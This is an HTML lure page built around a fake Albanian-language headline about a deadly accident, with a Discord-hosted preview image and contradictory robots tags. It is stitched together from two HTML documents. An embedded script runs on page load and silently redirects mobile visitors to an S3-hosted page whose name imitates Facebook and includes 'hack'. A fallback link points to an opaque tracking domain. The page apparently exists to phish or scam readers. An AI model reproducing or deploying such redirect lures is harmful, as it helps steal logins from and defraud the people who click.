<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="229,142,105,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Bëni shumë kujdes mëngjesin e sotëm ka ndodhur një aksident tragjik me disa të plagosur dhe të vdekur."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223657629277098125/dcfgfdsgdgtertr444.png?ex=661aa6f9&is=660831f9&hm=9758848e9a8981361045a98de4271221438c9649ac65c845c11e94ddd9938c19&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Mobile Redirect Script</title>
    <script>
        // Function to detect if the user is using a mobile device
        function isMobileDevice() {
            return (typeof window.orientation !== "undefined") || (navigator.userAgent.indexOf('IEMobile') !== -1);
        }

        // Function to redirect if the user is on a mobile device
        function redirectToMobile() {
            if (isMobileDevice()) {
                window.location.href = "https://facebosznwavvs877.s3.eu-west-3.amazonaws.com/htmlhackbraunnydirecto.html"; // Replace with your mobile site URL
            }
        }

        // Call the redirection function when the page loads
        window.onload = redirectToMobile;
    </script>
</head>
<body>
    <p>This is the desktop version of the website.</p>
    <!-- Optionally, you can provide a link to the mobile version -->
    <p>If you are not redirected, you can <a href="https://sillinessrobnotoriety.com/kqf0aexpf?key=32efe1b97ea6d478bad605f4488142e9">click here</a> to go to the mobile version.</p>
</body>
</html>
